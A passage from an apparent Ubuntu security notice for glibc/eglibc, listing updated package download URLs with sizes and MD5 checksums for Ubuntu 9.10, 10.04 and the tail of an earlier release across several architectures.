f963e6d04559bb569586e03eead5f35f\r\n \r\nhttp://ports.ubuntu.com/pool/main/g/glibc/libnss-files-udeb_2.9-4ubuntu6.2_powerpc.udeb\r\n Size/MD5: 17678 3fd3bae73ed0e654c5d07e7a2e694e80\r\n http://ports.ubuntu.com/pool/universe/g/glibc/nscd_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 195190 7a1334abeddeb4b770641337809f87a0\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dbg_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 41730070 2901ec12447e705a20aebd6664950e8e\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev-sparc64_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 2611358 a51a473fddc8b81bc0b50b4f977cb42d\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 2853224 5fd3163eed86cb5fcb8f22165b0844cd\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-pic_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1646964 0161e5e4d8a472ddd4061eaf5989087f\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-prof_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 2335570 53faa5c2e0e63f888259d1c0288eb512\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparc64_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 4307926 9e9ac321176de4a82e543e0f8aa5b15d\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparc64b_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1676032 5e3a8b43b7d12dba19a02f2000e208bf\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparc64v2_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1645056 026cb519a419c91d4fa4f087969d4841\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparc64v_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1645912 a98b15ed81e4331f3f007a93ca22a7d3\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparcv9b_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1703058 496a81c4820f903d90d9efdf5978a601\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparcv9v2_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1669704 dd30f683a9f445b69acf30b7db5b7243\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparcv9v_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1668794 0b444c3d9499fd0d2892670a30773cf5\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-udeb_2.9-4ubuntu6.2_sparc.udeb\r\n Size/MD5: 1261986 c9d69e7fb82c1494651811d91bb65510\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 5027636 7d4b2f4186184d69a9f42c532e8e09a6\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-dns-udeb_2.9-4ubuntu6.2_sparc.udeb\r\n Size/MD5: 9510 4ab5785386c3e5946bc286ba457fe7bc\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-files-udeb_2.9-4ubuntu6.2_sparc.udeb\r\n Size/MD5: 15786 4397a6b24c05b52905f9da144d9ee3a2\r\n http://ports.ubuntu.com/pool/universe/g/glibc/nscd_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 193592 0738595feb516240f4f541711eea8d09\r\n\r\nUpdated packages for Ubuntu 9.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.10.1-0ubuntu17.diff.gz\r\n Size/MD5: 2764610 d191364838300d9528a3dcdc23ed7832\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.10.1-0ubuntu17.dsc\r\n Size/MD5: 3023 24c25f384a0127f1d185c3affa4e749a\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.10.1.orig.tar.gz\r\n Size/MD5: 23283514 eceb7d0b99b383b87314216ecf85d79f\r\n\r\n Architecture independent packages:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/glibc-doc_2.10.1-0ubuntu17_all.deb\r\n Size/MD5: 3665716 962d3bb33133c935d7a0cbd788f3ca5e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/eglibc-source_2.10.1-0ubuntu17_all.deb\r\n Size/MD5: 12662626 a76e036d5e5514c9063577693a58d8f5\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-bin_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 784008 b64d86cdaf233ce46414a651c1dddc25\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-dev-bin_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 217222 28c6099c629cd9f0ae0d9c1de44352c3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dbg_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 10134028 e3cd0be6485d21957702d43fcd79c661\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev-i386_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 1517454 1a1a9351dd44d14201246cae6b6c0ec7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 2648182 eb6007d889f28488064b9fb00b9fbc98\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i386_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 3671710 6f14f4efa6f893e3b0c4f35cb72701c8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-pic_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 1594660 5e4102bc256482ba40c8ab8cedde0e78\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-prof_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 2101748 6685ad47a6965b8e3eae508638db3f9c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-udeb_2.10.1-0ubuntu17_amd64.udeb\r\n Size/MD5: 1203426 c995538c86d578511587329266dc8a33\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 4206456 061e43daf402bc6d00daf2d08a7e987e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-dns-udeb_2.10.1-0ubuntu17_amd64.udeb\r\n Size/MD5: 11714 fc16b9b2cd10bc61e8352c66f473a99f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-files-udeb_2.10.1-0ubuntu17_amd64.udeb\r\n Size/MD5: 20604 1c40ca8dc0cf0024605b4912e0d987cb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/nscd_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 209322 b84cf9e42637dec9a46ef05333f79dd0\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-bin_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 715424 90482e38227a74bbc187e8beb83c9543\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-dev-bin_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 207072 8f4360805a00f748da31caa6c1c11b2b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-amd64_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 4028646 23ed6778ae2a52bdab8c847805b734ee\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dbg_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 16320108 1e8cb0893f2e2e3b02e8974c3c9dc79f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev-amd64_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 2006112 f97d047adc9567565e7cd0fc6cc3a4e0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 4762368 9157f97474b89085f215790334576755\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i686_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 1198942 ced86ee49eb76bb3ca2051da4a713efe\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-pic_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 1225000 83f79ad1271d1c774817beafbef9a629\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-prof_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 1520498 496a6155b606fc00c2bc2423bdf0d9a6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-udeb_2.10.1-0ubuntu17_i386.udeb\r\n Size/MD5: 858082 e65b4b368e91f442dacd5e9ca086598b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-xen_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 1203822 b6e1ff1fbc02f6f02bf6a7f62987f9ed\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 3759426 2224021366fb3330852e48a013dcc7d8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-dns-udeb_2.10.1-0ubuntu17_i386.udeb\r\n Size/MD5: 10352 72f3b82d31846fd2f719b1b55559c002\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-files-udeb_2.10.1-0ubuntu17_i386.udeb\r\n Size/MD5: 16654 7f06cb95d112d7a19fd258686c867acb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/nscd_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 201202 b82eed92ddb635bccc88e27f40b833bc\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-bin_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 749230 0305dc258afb47827921a26bdbec8880\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-dev-bin_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 210708 a6fa88f99b91fc5f455d8964620a3c38\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dbg_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 5748396 d3626bbb1f8ffe23b54c6238958aa11f\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 2164224 e76887b205663c72ff072a5bb29c11db\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-pic_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 1252830 c5ebeb0b0ce34800d524f5872e200109\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-prof_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 1622630 c670092e5dbd9e5a4f70f4233f3d314a\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-udeb_2.10.1-0ubuntu17_lpia.udeb\r\n Size/MD5: 916122 6865d59b2aea3363f1fb38c5293c265b\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 3815562 73118ff8e737bcee40a5e3adfee00328\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libnss-dns-udeb_2.10.1-0ubuntu17_lpia.udeb\r\n Size/MD5: 10628 cbd0f6686781f975df75934dda5d0bad\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-files-udeb_2.10.1-0ubuntu17_lpia.udeb\r\n Size/MD5: 16924 faf7d75ff6b0d40d733a79cd1d00bdfd\r\n http://ports.ubuntu.com/pool/universe/e/eglibc/nscd_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 203098 fc6307c3eebe0982ef1f8972a92b53a1\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-bin_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 770646 93a62085c8c4136943d5771574c12baf\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-dev-bin_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 213310 15c53e076943b4d9cbd712aafa12f628\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dbg_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 11841628 0b45e497b2189cb8e8575d9efcc96a16\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev-ppc64_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 2393796 f1c26c9a4f56dc30e975508e05f3a104\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 2884532 666a9b85449458b2af0600b550c67bda\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-pic_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 1677464 150b26b238f188fd550121122a6a5cfc\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-ppc64_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 4335890 c063ba150b2523bcfb8fd48542a16a6c\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-prof_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 2357700 7aef87fbdb009265f1a49657ee3a67ae\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-udeb_2.10.1-0ubuntu17_powerpc.udeb\r\n Size/MD5: 1270036 34aeb02387158f91ce3a2fb7891cfe13\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 4328692 03ba77aa933940c6d80045955496af82\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-dns-udeb_2.10.1-0ubuntu17_powerpc.udeb\r\n Size/MD5: 10964 05ab15e2dc0952dcbd3ad230373db843\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-files-udeb_2.10.1-0ubuntu17_powerpc.udeb\r\n Size/MD5: 17626 4787bafb46813d14e4104697ac77d0bc\r\n http://ports.ubuntu.com/pool/universe/e/eglibc/nscd_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 204466 84ad2b0256a310205390988feaf92f39\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-bin_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 740968 1bf8ca6632ac8fb0def0549fb7ac4475\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-dev-bin_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 211732 556e5b93ec547e1b6c10d9989f4259cb\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dbg_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 42159894 d8c2cd58c34f19e80a10208af28f39b8\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev-sparc64_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 2610838 3f188583b100ddecd5251aad5d11b44c\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 2911996 bac4dfa1e6d87f659e0121e7884e7ad5\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-pic_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1701482 8b719beb3db87ef808db513e5e7718a6\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-prof_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 2372168 52c8d86dbd2b09819369bc48f0a745ba\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 4314674 99b7806d2194224fe8efea7d3e2d5e37\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64b_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1810766 402b00c70b94d48de3dca13cf41ca462\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64v2_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1756014 3126ff38c961f8b7161eccfed64b92ec\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64v_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1757098 b25c2163ea812d41ab886c4d6bb1c1be\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9b_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1644950 bf2720f4c20594e5c2ec1b0df947bc88\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9v2_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1715336 f5d5d97f342f78d98a1e24bbc074ea37\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9v_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1714512 f9d2e86504e28c0122f8f32a6a0d98c2\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-udeb_2.10.1-0ubuntu17_sparc.udeb\r\n Size/MD5: 1300450 a5eafc7ebef9f3b4389ea87a7f36de62\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 4345332 46e36d3b7bfdad43ddcc1f09286f0437\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-dns-udeb_2.10.1-0ubuntu17_sparc.udeb\r\n Size/MD5: 9736 af151299a6f45ac6499a2e30a8cdbadf\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-files-udeb_2.10.1-0ubuntu17_sparc.udeb\r\n Size/MD5: 16298 f5c2f5089bc4f8e76dc38a5c272d8ee7\r\n http://ports.ubuntu.com/pool/universe/e/eglibc/nscd_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 203108 d0b9ccf17fcf7d4b3ee7acc0739717bb\r\n\r\nUpdated packages for Ubuntu 10.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.11.1-0ubuntu7.1.diff.gz\r\n Size/MD5: 871997 6cb1fa46714a4ea872b0938530d1449f\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.11.1-0ubuntu7.1.dsc\r\n Size/MD5: 3055 15057988269fe1555618a2972cc0a4a6\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.11.1.orig.tar.gz\r\n Size/MD5: 23460095 26ec82ef1bd2644d1c2c872d8a6213e7\r\n\r\n Architecture independent packages:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/glibc-doc_2.11.1-0ubuntu7.1_all.deb\r\n Size/MD5: 3712616 b9b181fe273a594057a6e65a5bbf95c9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/eglibc-source_2.11.1-0ubuntu7.1_all.deb\r\n Size/MD5: 11616074 d801ebabe501c001b78385ca9d793b3a\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-bin_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 810072 0489b93dfbc791b54591d8e3457e21b2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-dev-bin_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 223276 f04721a4e135a04eec5ccc4d0b6c7db5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dbg_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 10255746 a36cf25116233f0b15f32cd8c667972c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev-i386_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 1552808 3c744ca9d93d81b75ce031e2fe16a9de\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 2703180 2a5e3f050b1d2a50393c6ba12ef49089\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i386_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 3710126 2700f4b229af3efd218fb67610d8f898\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-pic_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 1629800 66b8135ced121b530c95ff443e121041\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-prof_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 2156366 4dcf7f9d2a53935e0559d0d80b78a064\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-udeb_2.11.1-0ubuntu7.1_amd64.udeb\r\n Size/MD5: 1229358 b3f45ee5b58e3f1205c180759862c726\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 4249454 3c5f3f2d2cc35cb44a2cb4b2fff694be\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-dns-udeb_2.11.1-0ubuntu7.1_amd64.udeb\r\n Size/MD5: 11686 2180e846de578662b45fcf8449c66053\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-files-udeb_2.11.1-0ubuntu7.1_amd64.udeb\r\n Size/MD5: 21428 012253a5e8229cb25f1aba244fa492a7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/nscd_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 210942 beecc7017379c71f69bc4ed50cd67a7b\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-bin_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 722658 22f9d5f517e79594aed98ba21d8448f5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-dev-bin_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 212990 df89f49b2ac9d10d073a2f3c66b770fb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-amd64_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 4061930 77640fe9e6939467fc81cea059698796\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dbg_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 16490158 7b2f1a8c1549bc48368515d9b744c47f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev-amd64_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 2045282 fa53c541bc913da98fc06547529592e1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 4839460 ec9848fc797098f9b7c643682f2118b3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i686_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 1227982 24fe37a9fd4cb95b6f599e05332d2e1a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-pic_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 1233472 affd51c971e15359d35d7c803a2d3d7d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-prof_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 1536376 53325ae2a14df686ac4af152883c13f9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-udeb_2.11.1-0ubuntu7.1_i386.udeb\r\n Size/MD5: 861080 99cfc04f708da825ff619302e7343ac8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-xen_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 1232750 8540b9d72b7cbc05d64b19ba271fa010\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 3779220 05f769d40e681c86bf6769a1f125f205\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-dns-udeb_2.11.1-0ubuntu7.1_i386.udeb\r\n Size/MD5: 10264 a39304c1dc680e0bb3bcb0b64beb168b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-files-udeb_2.11.1-0ubuntu7.1_i386.udeb\r\n Size/MD5: 16746 ecd47235c17a7c7a95296d320f624925\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/nscd_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 202878 9c72bebbc52970cdf400d9a0a6a0c01c\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-bin_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 778576 162b45633f50cd955fc4822fef84512d\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-dev-bin_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 219188 0e90cb7859b80fe8587c284b1cf2ba64\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dbg_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 11935376 0ec61ccc16a4002927ef6a34b1c3037b\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev-ppc64_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 2411342 e3df46065b5b2287631fde8e33d06ac1\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 2904744 f8e054b36e1c25d4d0ad773e2df1dae8\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-pic_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 1684904 6edc1beb6a128ed03cc917ea14d9871f\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-ppc64_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 4356036 c58376924038aa0e8d5d3a2d4d2f5ddd\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-prof_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 2376404 a1da1310e586a6cd24691676e0d5f37d\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-udeb_2.11.1-0ubuntu7.1_powerpc.udeb\r\n Size/MD5: 1273650 b194ff197a44b58946188a0cb46597d8\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 4350224 9a751d3b679249da9ca84a00b38867e8\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-dns-udeb_2.11.1-0ubuntu7.1_powerpc.udeb\r\n Size/MD5: 10960 a2a01824fe1c01db5beda29bd94f85e9\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-files-udeb_2.11.1-0ubuntu7.1_powerpc.udeb\r\n Size/MD5: 17544 15cf7394f54f03db0118041af9156d94\r\n http://ports.ubuntu.com/pool/universe/e/eglibc/nscd_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 207232 da3db73f45ccaa2ea442fa96cf30a7ab\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-bin_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 748374 110fddf0e827f284f39469f6ba7d88ff\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-dev-bin_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 217596 9b158e47c7b5de2faef5e489578a069b\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dbg_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 42615332 3961de031680240a37fc47296f419011\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev-sparc64_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 2630840 2e259c69a1da1e42ee363ae44cf440a8\r\n 